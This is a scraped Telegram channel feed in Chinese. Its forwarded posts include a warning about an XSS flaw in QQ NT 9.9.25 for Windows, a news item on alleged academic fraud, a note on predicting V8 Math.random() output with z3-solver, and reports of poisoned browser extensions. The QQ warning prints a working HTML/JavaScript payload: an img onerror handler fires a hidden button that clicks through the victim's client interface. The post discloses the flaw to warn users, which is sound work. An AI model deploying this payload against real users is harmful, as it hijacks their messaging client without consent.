Forwarded from Mirraの杂货铺 | Link to World!
This media is not supported in your browser
VIEW IN TELEGRAM
警告!
QQ NT 9.9.25 Windows 存在跨站脚本攻击漏洞(XSS)
例如
所有在此版本的用户看到特定代码会自动在本机执行
理论上可执行任意点击脚本,具有极高风险
请勿更新到本版本。已在此版本的用户请降级
更新:腾讯内部已知
QQ NT 9.9.25 Windows 存在跨站脚本攻击漏洞(XSS)
例如
<div>
<button id="test" onclick="var list = document.documentElement.getElementsByClassName('panel-header__action')[0].children[0];list.children[list.childNodes.length - 1].children[0].click();setTimeout(() => {var an = document.documentElement.getElementsByClassName('group-user--btn')[1];an.children[0].children[0].click();setTimeout(() => {var input = document.getElementsByClassName('relation-tree')[0].getElementsByClassName('viewport-list__inner')[0].children[0].children[0].children[0];input.click();setTimeout(() => document.getElementsByClassName('selector-layout__right-area')[0].getElementsByClassName('q-button--primary')[0].click(), 0)}, 0)}, 1);"></button>
<img src="x" onerror="document.getElementById('test').click()">
</div>
所有在此版本的用户看到特定代码会自动在本机执行
理论上可执行任意点击脚本,具有极高风险
请勿更新到本版本。已在此版本的用户请降级
更新:腾讯内部已知
<NullPointerException> 二周目
我明明是中午刷的机啊
12点多原本想k40强兼sukisu的 结果不出所料的变砖了
Forwarded from 风向旗参考快讯
传“100%国产的蛟龙号”关键部件靠进口
近日,江苏科技大学前首席科学家、材料科学与工程学院原教授郭伟,被媒体曝光涉嫌学术履历造假,引发社会高度关注。事件发酵后,江苏科技大学已启动调查程序,相关科研项目是否存在违规申报、论文是否存在学术不端,也被学界持续关注。网上流传的一份长文爆料称,郭伟相关问题“比大众想象的更严重”。爆料声称:郭伟团队曾在媒体宣传中将 “蛟龙号” 项目包装为高强度合金研发成果,并称其自主研制的零部件达到“百分之百国产化”。但爆料指出蛟龙号所用的部分关键合金及材料“其实均为国外进口”,所谓“自主率100%”被其指为“并非简单的进口零件组装,而是大量外国产品被宣称为国产成果”。
—— 新浪财经(网易科技)
近日,江苏科技大学前首席科学家、材料科学与工程学院原教授郭伟,被媒体曝光涉嫌学术履历造假,引发社会高度关注。事件发酵后,江苏科技大学已启动调查程序,相关科研项目是否存在违规申报、论文是否存在学术不端,也被学界持续关注。网上流传的一份长文爆料称,郭伟相关问题“比大众想象的更严重”。爆料声称:郭伟团队曾在媒体宣传中将 “蛟龙号” 项目包装为高强度合金研发成果,并称其自主研制的零部件达到“百分之百国产化”。但爆料指出蛟龙号所用的部分关键合金及材料“其实均为国外进口”,所谓“自主率100%”被其指为“并非简单的进口零件组装,而是大量外国产品被宣称为国产成果”。
—— 新浪财经(网易科技)
Forwarded from 深夜不开门的深夜食堂|败犬柠檬太多啦 (Lemonno)
Media is too big
VIEW IN TELEGRAM
Forwarded from 🔮 奇闻异录 与 沙雕时刻 meme collection (砂糖爱丽丝)
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from FREE 中文
Forwarded from 简中互联网废物大赏
Telegraph
学术圈炸了!ICLR评审大开盒,原来低分是好友打的
机器之心报道
Forwarded from 橘橘橘子汁 & 🍊
Media is too big
VIEW IN TELEGRAM
太好玩了 z3-solver
https://www.arealme.com/luck-test/cn/
这个网站是用 Math.random() 来抛随机数的,而众所周知, Math.random() 不是密码学安全的,它在 v8 用的是 xorshift128+,它很快,但是所有运算都是线性的
于是我们可以用 z3-solver 通过几个随机数求解出其内部 state,然后算出接下来一段时间内的随机数
一直知道可以这么干,今天终于实践了一下(
https://www.arealme.com/luck-test/cn/
这个网站是用 Math.random() 来抛随机数的,而众所周知, Math.random() 不是密码学安全的,它在 v8 用的是 xorshift128+,它很快,但是所有运算都是线性的
于是我们可以用 z3-solver 通过几个随机数求解出其内部 state,然后算出接下来一段时间内的随机数
一直知道可以这么干,今天终于实践了一下(
Forwarded from 橘橘橘子汁 & 🍊
橘橘橘子汁 & 🍊
WeTab 和 Infinity 新标签页似乎都被投毒了 安全... https://meta.appinn.net/t/topic/78159 https://www.bleepingcomputer.com/news/security/shadypanda-browser-extensions-amass-43m-installs-in-malicious-campaign/ 不过 WeTab 他们不认账:https://mp.weixin.qq.com/s/E8YQLWZFM2J7r5DZNSl47w
频道主正在使用。。。
补充:该公司的所有产品均有涉黑风险,不建议使用
补充:该公司的所有产品均有涉黑风险,不建议使用